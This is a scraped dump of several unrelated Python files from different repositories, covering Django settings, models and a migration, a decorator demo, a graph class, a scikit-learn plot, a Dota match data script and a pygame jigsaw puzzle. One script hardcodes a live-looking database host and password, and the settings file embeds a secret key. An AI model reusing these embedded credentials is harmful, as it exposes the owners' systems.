b142a614f33910b10f5bfcc72d387e9e9ffb65db
|
722b34eb41b5d22962fd56b5c9c795f8088dabda
|
/mysite/settings.py
|
8e06fb3d5a0395575971c22f829ac864a9b08c36
|
[] |
no_license
|
gabritejedor/djangogirls
|
fd82b8f3ac379ef7290cf4c9053f79465616d9a7
|
42eb45de355b993f120874e247169f740e41ba79
|
refs/heads/master
| 2022-12-14T15:49:09.044452
| 2020-09-09T12:11:20
| 2020-09-09T12:11:20
| 294,012,917
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,208
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.16.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3wd)&=ndlc^dv-xs(07g3-bm+(=iv4^9tk8uvuwet6-f@&w@!j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog.apps.BlogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'es-es'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"tejedor.gabriel@gmail.com"
] |
tejedor.gabriel@gmail.com
|
64d5c91a43affc005fb4ff69a7c265cf050a0706
|
fe352d7f2ff89a8f71dedc0728a8e0f8cfd00c82
|
/example001.py
|
661d5148f4b2e1284abe73cee277c28228f2020c
|
[] |
no_license
|
fenwk0/Decorating
|
57c102ef67bf64baa46ab6983f797ec5d565fc0c
|
59745956ca60329b6a35fefd0813e10dfa33e0f3
|
refs/heads/master
| 2020-12-30T17:10:51.627879
| 2017-05-17T06:42:42
| 2017-05-17T06:42:42
| 91,061,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
import timeit
__author__ = 'fenwk0'
# This is our decorator
# taken from
# https://ains.co/blog/things-which-arent-magic-flask-part-1.html
# see also
# https://www.thecodeship.com/patterns/guide-to-python-function-decorators/
def time_decorator(f):
# This is the new function we're going to return
# This function will be used in place of our original definition
def wrapper():
start = timeit.default_timer()
print("Start Time: ", start)
f()
print("Time taken: ", timeit.default_timer() - start)
return wrapper
def simple_decorator(f):
# This is the new function we're going to return
# This function will be used in place of our original definition
def wrapper():
print("Entering Function")
f()
print("Exited Function")
return wrapper
@time_decorator
@simple_decorator
def hello():
print("Hello World")
hello()
|
[
"noreply@github.com"
] |
fenwk0.noreply@github.com
|
d5b114437ecf22f7655de0f685b1515689fa6a50
|
1b6e8a45af2328bac9fb5efe9d9706165b3e477f
|
/HelloPsych/vline/templatetags/.svn/text-base/vline_tags.py.svn-base
|
d431062c6a5a6e96cb596f3c62bc8ff87ad3bfa0
|
[] |
no_license
|
abbhinavvenkat/HelloPsych
|
e6b247fb15a9877660b243bc06535ff73011fcb4
|
5b3c7a84c00e70cf903cd7a5c254660139b454e2
|
refs/heads/master
| 2021-01-10T20:43:29.795597
| 2014-12-29T17:20:43
| 2014-12-29T17:20:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
from django import template
from .. import vline
import json
def vline_service_id():
return "'" + vline.SERVICE_ID + "'"
def vline_auth_token(user):
return "'" + vline.create_auth_token(user.id) + "'"
def vline_user_profile(user):
return json.dumps(vline.create_user_profile(user))
register = template.Library()
register.simple_tag(vline_service_id)
register.filter("vline_auth_token", vline_auth_token)
register.filter("vline_user_profile", vline_user_profile)
|
[
"abbhinavvenkat@gmail.com"
] |
abbhinavvenkat@gmail.com
|
|
07fbce72a887e82a1502046c7d5fe3a245a181f4
|
76119dbd4710437f7189013e615cb403f388ad60
|
/a_star/graph.py
|
bef1f52e267b8d480a7820c98fe60e99765bd408
|
[] |
no_license
|
joao1pedro/IA
|
855251c5ecb27ee1a746eafa71959dcbc26a569e
|
a42a08494c1824b8f7088f4572f21b965c706584
|
refs/heads/main
| 2023-04-19T11:34:21.463776
| 2021-05-10T19:40:29
| 2021-05-10T19:40:29
| 366,155,319
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
from vertex import *
class Graph:
def __init__(self):
self.camp = {}
def addVertex(self, city, value):
vertex = Vertex(city, value)
self.camp[city] = vertex
def addEdge(self, city_a, city_b, distance, value_a=0, value_b=0):
if city_a not in self.camp:
self.addVertex(city_a, value_a)
if city_b not in self.camp:
self.addVertex(city_b, value_b)
self.camp[city_a].addNeighbor(city_b, distance)
self.camp[city_b].addNeighbor(city_a, distance)
def getVertices(self):
return self.camp.keys()
def getNeighbors(self, city):
return self.camp[city].neighbors()
def getCost(self, city):
return self.camp[city].costValue()
def getEdges(self, city):
return self.camp[city].edges()
|
[
"jpedro@alu.ufc.br"
] |
jpedro@alu.ufc.br
|
efa3eef31d0a62564b9ce9cdf6b6a9aec5e41cf9
|
c7b5e983e8d831a39063698d700478eff37653e9
|
/listings/models.py
|
e102e6a623b8a88b2f7faa2f9c9dc0fa73ecaa72
|
[] |
no_license
|
Luis846/monsters-rolodex
|
86a0654700908d602401f0780fac2116e84f7e11
|
85537167410d5316429512f437c255246b0c3d11
|
refs/heads/master
| 2020-12-26T23:56:34.387150
| 2020-02-02T00:17:04
| 2020-02-02T00:17:04
| 237,694,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,438
|
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y/%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_2 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_3 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_4 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_5 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_6 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"luis.rivera846@gmail.com"
] |
luis.rivera846@gmail.com
|
61bcac812f0c491d1329ba7acc050ea1dfd83062
|
2d49a4926e71b958256fa76d238daf8bf31d33c9
|
/Hero2Vector/utils/prepare_data.py
|
022393e1bd157c44fcd817c81ae9455f98b278d4
|
[
"MIT"
] |
permissive
|
diorw/dota_analyze_and_prediction
|
d4a748328965d632ae86168ccfab65d6862f7ddc
|
3f5a6f21ba74fe065bbb5cc2fa8f512986023249
|
refs/heads/master
| 2020-12-19T18:17:19.049147
| 2020-05-25T08:36:08
| 2020-05-25T08:36:08
| 235,811,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,378
|
py
|
import pymysql
import json
import pandas as pd
conn = pymysql.connect(host = '120.55.167.182',user = 'root',password = 'wda20190707',database = 'dota')
cursor = conn.cursor()
sql = '''
select player_1_hero_id,player_2_hero_id,player_3_hero_id,
player_4_hero_id,player_5_hero_id,player_6_hero_id,player_7_hero_id
,player_8_hero_id,player_9_hero_id,player_10_hero_id,win
from dota.`match`
where game_mode = 22 or game_mode = 3
'''
cursor.execute(sql)
match_data = cursor.fetchall()
match_data = list(match_data)
match_data = list(map(list,match_data))
match_df = pd.DataFrame(match_data)
columns = []
for i in range(1,11):
columns.append("player_"+str(i)+"_hero_id")
columns.append("target")
match_df.columns = columns
hero_stats = pd.read_csv("../input/hero_stats.csv")
print(hero_stats.columns)
kz,hx,fz,ts,bf,xs,nj,tj = {},{},{},{},{},{},{},{}
for index,row in hero_stats.iterrows():
kz[row['id']] = row['kong_zhi']
hx[row['id']] = row['he_xin']
fz[row['id']] = row['fu_zhu']
ts[row['id']] = row['tao_sheng']
bf[row['id']] = row['bao_fa']
xs[row['id']] = row['xian_shou']
nj[row['id']] = row['nai_jiu']
tj[row['id']] = row['tui_jin']
for i in range(8):
match_df['radiant_$' + str(i)] = 0
match_df['dire_$' + str(i)] = 0
print(match_df.head(5))
j = 0
for dic in kz,hx,fz,ts,bf,xs,nj,tj:
# 产生8*2列 夜宴天辉分别8列
for i in range(5):
#print(match_df['radiant_$'+str(j)])
match_df['radiant_$'+str(j)] = match_df['radiant_$'+str(j)]+match_df["player_" + str(i + 1) + "_hero_id"].apply(lambda x: int(dic[int(x)]))
for i in range(5,10):
#print(match_df['dire_$' + str(j)])
match_df['dire_$' + str(j)] = match_df['dire_$' + str(j)]+match_df["player_" + str(i + 1) + "_hero_id"].apply(lambda x: int(dic[int(x)]))
j = j + 1
print(match_df.head(5))
#
#
match_df.to_csv("../input/temp.csv")
# with open("E://dota_prediction//Hero2vecModel-master//Hero2vecModel-master//input//id_to_heroname.json","r") as fp:
# id2heroname = json.load(fp)
# print(id2heroname)
# print(match_df.columns)
# for col in match_df.columns:
# if(col!="target"):
# print(match_df[col])
# match_df[col] = match_df[col].apply(lambda x:id2heroname[str(x)])
# print(match_df[col])
# match_df.to_csv("match.csv",encoding="utf8")
|
[
"406714601@qq.com"
] |
406714601@qq.com
|
607964a9ba93205db1311061e4de8f926aede1d4
|
7d242bae938def0417383a65222a5e32ef9972a9
|
/seed.py
|
cddd698a304c2ae896d8d11b8c5521128f14dce1
|
[] |
no_license
|
fan777/flask-feedback
|
1050ea18e24d3d219e35e9373ea619182873f59e
|
1edefa1e8f9821dbae751317ec50cd781c62f333
|
refs/heads/main
| 2023-04-16T15:43:06.022921
| 2021-04-23T20:58:59
| 2021-04-23T20:58:59
| 356,971,920
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
from app import db
from models import User, Feedback
db.drop_all()
db.create_all()
u1 = User.register('test', 'password', 'test@test.com', 'first', 'last')
u2 = User.register('cfan', 'password', 'cfan@test.com', 'charlie', 'fan')
u3 = User.register('jen', 'password', 'jen@test.com', 'jennifer', 'fan')
u4 = User.register('jerry', 'password', 'jerry@test.com', 'jerry', 'fan')
f1 = Feedback(title='title1', content='content1', username='test')
f2 = Feedback(title='title2', content='content2', username='test')
f3 = Feedback(title='title3', content='content3', username='test')
f4 = Feedback(title='title of feedback',
content='content is king', username='cfan')
db.session.add_all([u1, u2, u3, u4])
db.session.commit()
db.session.add_all([f1, f2, f3, f4])
db.session.commit()
|
[
"fan777@gmail.com"
] |
fan777@gmail.com
|
9feb322d92fc61c6492ea50a0f8ab033502c1e49
|
ccf5405798a32ffeb376125a27ce6795ecb5322e
|
/selector/admin.py
|
2c6c4590e3c41ea58ccb5080b925370718d9c86c
|
[] |
no_license
|
nicksunday/gamefinder
|
3d7591d72893d8121a860661f266251013da8aac
|
6bfad18998dce3413c67a7eb6ecb0940b8d67538
|
refs/heads/master
| 2022-12-25T13:52:02.385632
| 2020-09-28T19:59:03
| 2020-09-28T19:59:03
| 296,515,048
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,187
|
py
|
from django.contrib import admin
from .models import Artists, Categories, Designers, Families, GameArtists, GameCategories, GameDesigners, GameFamilies, GameMechanics, GamePublishers, GameSubdomains, Games, Mechanics, Publishers, Subdomains
# Register your models here.
#admin.site.register(Artists)
#admin.site.register(Categories)
#admin.site.register(Designers)
#admin.site.register(Families)
#admin.site.register(GameArtists)
#admin.site.register(GameCategories)
#admin.site.register(GameDesigners)
#admin.site.register(GameFamilies)
#admin.site.register(GameMechanics)
#admin.site.register(GamePublishers)
#admin.site.register(GameSubdomains)
#admin.site.register(Games)
#admin.site.register(Mechanics)
#admin.site.register(Publishers)
#admin.site.register(Subdomains)
@admin.register(Artists)
class ArtistsAdmin(admin.ModelAdmin):
list_display = ('name',)
@admin.register(Categories)
class CategoriesAdmin(admin.ModelAdmin):
list_display = ('category',)
@admin.register(Designers)
class DesignersAdmin(admin.ModelAdmin):
list_display = ('designer',)
@admin.register(Families)
class FamiliesAdmin(admin.ModelAdmin):
list_display = ('family',)
@admin.register(GameArtists)
class GameArtistsAdmin(admin.ModelAdmin):
pass
@admin.register(GameCategories)
class GameCategoriesAdmin(admin.ModelAdmin):
pass
@admin.register(GameDesigners)
class GameDesignersAdmin(admin.ModelAdmin):
pass
@admin.register(GameFamilies)
class GameFamiliesAdmin(admin.ModelAdmin):
pass
@admin.register(GameMechanics)
class GameMechanicsAdmin(admin.ModelAdmin):
pass
@admin.register(GamePublishers)
class GamePublishersAdmin(admin.ModelAdmin):
pass
@admin.register(GameSubdomains)
class GameSubdomainsAdmin(admin.ModelAdmin):
pass
@admin.register(Games)
class GamesAdmin(admin.ModelAdmin):
list_display = ('name', 'average', 'minplayers', 'maxplayers', 'thumbnail')
list_filter = ('minplayers', 'maxplayers')
@admin.register(Mechanics)
class MechanicsAdmin(admin.ModelAdmin):
pass
@admin.register(Publishers)
class PublishersAdmin(admin.ModelAdmin):
pass
@admin.register(Subdomains)
class SubdomainsAdmin(admin.ModelAdmin):
pass
|
[
"sunday.nick@gmail.com"
] |
sunday.nick@gmail.com
|
c50a342acb6bc87b8a8f688c00e2d4ed0b1e549d
|
758f8908c777bfbecaf29f7586f0f6431f272cfa
|
/SciLearn/logisticregression.py
|
28438a3291fa90d6dc77d314c73c319428b0ac82
|
[] |
no_license
|
andyxiao24/sklearnlearn
|
677c79be17813ee717d5f1518f2890642f06c55a
|
35cfe6fb312cb9ba17b45c83c3c1b32c970784f7
|
refs/heads/master
| 2020-03-31T12:34:30.618113
| 2018-10-18T09:20:49
| 2018-10-18T09:20:49
| 152,221,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
print(__doc__)
# Code source: Gael Varoquaux
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
# General a toy dataset:s it's just a straight line with some Gaussian noise:
xmin, xmax = -5, 5
n_samples = 100
np.random.seed(0)
X = np.random.normal(size=n_samples)
y = (X > 0).astype(np.float)
X[X > 0] *= 4
X += .3 * np.random.normal(size=n_samples)
X = X[:, np.newaxis]
# Fit the classifier
clf = linear_model.LogisticRegression(C=1e5, solver='lbfgs')
clf.fit(X, y)
# and plot the result
plt.figure(1, figsize=(4, 3))
plt.clf()
plt.scatter(X.ravel(), y, color='black', zorder=20)
X_test = np.linspace(-5, 10, 300)
def model(x):
return 1 / (1 + np.exp(-x))
loss = model(X_test * clf.coef_ + clf.intercept_).ravel()
plt.plot(X_test, loss, color='red', linewidth=3)
ols = linear_model.LinearRegression()
ols.fit(X, y)
plt.plot(X_test, ols.coef_ * X_test + ols.intercept_, linewidth=1)
plt.axhline(.5, color='.5')
plt.ylabel('y')
plt.xlabel('X')
plt.xticks(range(-5, 10))
plt.yticks([0, 0.5, 1])
plt.ylim(-.25, 1.25)
plt.xlim(-4, 10)
plt.legend(('Logistic Regression Model', 'Linear Regression Model'),
loc="lower right", fontsize='small')
plt.tight_layout()
plt.show()
|
[
"xp373150@163.com"
] |
xp373150@163.com
|
a602f9773fece56e8bf5673f94bbf685cd12f67b
|
20dcfdc70daa62a6886c8717bb4052177098d830
|
/blog/migrations/0001_initial.py
|
3f7f01efffe4692656cbda4e4ddb286bcd5eff1c
|
[] |
no_license
|
15179711268/student_sys
|
71f92e6f483e62fb3c46c0424bff794abfb692f6
|
a2ef88c65273b3a2a0d15a06371a42bf17ab6306
|
refs/heads/master
| 2020-12-02T02:52:55.055579
| 2020-01-02T09:44:51
| 2020-01-02T09:44:51
| 230,863,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,356
|
py
|
# Generated by Django 3.0.1 on 2019-12-31 08:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='名称')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除')], default=1, verbose_name='状态')),
('is_nav', models.BooleanField(default=False, verbose_name='是否为导航')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='作者')),
],
options={
'verbose_name': '分类',
'verbose_name_plural': '分类',
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=10, verbose_name='名称')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除')], default=1, verbose_name='状态')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='作者')),
],
options={
'verbose_name': '标签',
'verbose_name_plural': '标签',
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='标题')),
('desc', models.CharField(blank=True, max_length=1024, verbose_name='摘要')),
('content', models.TextField(help_text='正文必须为MarkDown格式', verbose_name='正文')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除'), (2, '草稿')], default=1, verbose_name='状态')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='blog.Category', verbose_name='分类')),
('ower', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='作者')),
('tag', models.ManyToManyField(to='blog.Tag', verbose_name='标签')),
],
options={
'verbose_name': '文章',
'verbose_name_plural': '文章',
'ordering': ['-id'],
},
),
]
|
[
"1336278145@qq.com"
] |
1336278145@qq.com
|
65775a3e57d9d65d42dd32185860bd1e5c3434c6
|
f193f4032a3b710b8ee8cc9dab6b8763d3fa85ba
|
/easyX.py
|
92b49d05a65069bb9d1953325c6865ee8ea2b56e
|
[] |
no_license
|
Ameema-Arif/Jigsaw-Puzzle-using-Python
|
171421e2ae74a61cbc6d9240894aee9636c73170
|
f6f737dfc992f99f73193acf26b5e5fec8e9f0e4
|
refs/heads/master
| 2023-02-06T17:30:48.176999
| 2023-01-31T15:15:54
| 2023-01-31T15:15:54
| 248,823,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,498
|
py
|
import pygame as p
import time
from tkinter import *
import sys
class Puzzle(object):
Sound=r"D:\OOP\Project\SubMusic.ogg"
def Win(self):
p.init()
Wint=p.display.set_mode((400,400))
p.display.set_caption("Game Over")
Wimg=p.image.load(r"D:\OOP\Project\game-result-win.png").convert()
Wimg=p.transform.scale(Wimg,(400,400))
Wint.blit(Wimg,[10,10])
p.display.update()
time.sleep(2)
def Lose(self):
p.init()
Lint=p.display.set_mode((400,400))
p.display.set_caption("Game Over")
Limg=p.image.load(r"D:\OOP\Project\you-lose1.png").convert()
Limg=p.transform.scale(Limg,(400,400))
Lint.blit(Limg,[10,10])
p.display.update()
time.sleep(1)
def Sound(self):
p.mixer.init()
p.mixer.music.load("D:\OOP\Project\SubMusic.ogg")
p.mixer.music.play()
class Easy(Puzzle):
x=p.init()
screen=p.display.set_mode((500,400))
z=p.display.set_caption("Jigsaw puzzle")
Puzzle.Sound(X)
first=p.image.load(r"D:\OOP\Project\looneytunes1.png").convert()
second=p.image.load(r"D:\OOP\Project\looneytunes2.png").convert()
third=p.image.load(r"D:\OOP\Project\looneytunes3.png").convert()
fourth=p.image.load(r"D:\OOP\Project\looneytunes4.png").convert()
first=p.transform.scale(first,(150,150))
second=p.transform.scale(second,(150,150))
third=p.transform.scale(third,(150,150))
fourth=p.transform.scale(fourth,(150,150))
p.mouse.set_visible(True)
done=False
a,b=0,0
c,d=152,0
e,f=0,152
g,h=152,152
L=[]
m=[]
def Win(self):
Puzzle.Win(self)
def Lose(self):
Puzzle.Lose(self)
for event in p.event.get():
screen.blit(first,[a,b])
screen.blit(second,[c,d])
screen.blit(third,[e,f])
screen.blit(fourth,[g,h])
#*********************************Game loop**************************************************************************************************
while done==False:
for event in p.event.get():
screen.blit(fourth,[a,b])
screen.blit(third,[c,d])
screen.blit(second,[e,f])
screen.blit(first,[g,h])
mx,my=p.mouse.get_pos()
#First
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if mx<=150 and 0<= my <=150:
L.append([150,0,150])
#second
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if 152<= mx <=302 and my<=150:
L.append([152,302,150])
#Third
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if mx <=152 and 152<= my<=302:
L.append([152,152,302])
#Fourth
if event.type==p.MOUSEBUTTONDOWN and event.button==1:
if 152<= mx <=302 and 152<= my<=302:
L.append([152,302,152,302])
# *********************************************************First**************************************************************************
#T1->T2
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,150]):
print("X")
if a==0 and b==0 and c==152 and d==0:
a=152
c=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,152,302]):
print("X")
if a==152 and b==0 and e==0 and f==152:
a=0
b=152
e=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and e==152 and f==0:
a=152
b=0
e=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==0 and g==152 and h==152:
b=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and g==152 and h==0:
b=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,150]):
print("X")
if a==152 and b==0 and c==0 and d==0:
a=0
b=0
c=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,152,302]):
print("X")
if a==0 and b==0 and e==0 and f==152:
b=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and c==152 and d==0:
a=152
b=0
c=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2>T3
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,152,302]):
print("X")
if a==152 and b==0 and c==0 and d==152:
a=0
b=152
c=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and g==152 and h==152:
a=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and g==0 and h==152:
a=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and e==0 and f==0:
print(8)
b=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,152,302]):
print("X")
if a==0 and b==0 and g==152 and h==152:
a=152
b=152
g=0
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and g==0 and h==0:
a=0
b=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and c==152 and d==0:
b=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==0 and c==152 and d==152:
d=0
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and e==0 and f==152:
a=0
e=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if a==0 and b==152 and e==152 and f==152:
e=0
a=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
# ****************************************************Second************************************************************************
#T2->T1
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and c==152 and d==0:
a=152
c=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([150,0,150]):
print("X")
if a==152 and b==0 and c==0 and d==0:
a=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if e==0 and f==152 and c==0 and d==0:
f=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if e==0 and f==0 and c==0 and d==152:
d=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([150,0,150]):
print("X")
if g==152 and h==152 and c==0 and d==0:
g=0
h=0
c=152
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([150,0,150]):
print("X")
if g==0 and h==0 and c==152 and d==152:
c=0
d=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,152,302]):
print("X")
if c==152 and d==0 and e==0 and f==152:
c=0
d=152
e=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,152,302]):
print("X")
if c==0 and d==152 and e==152 and f==0:
c=152
d=0
e=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,152,302]):
print("X")
if c==0 and d==152 and a==0 and b==0:
d=0
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,152,302]):
print("X")
if c==0 and d==0 and a==0 and b==152:
b=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,152,302]):
print("X")
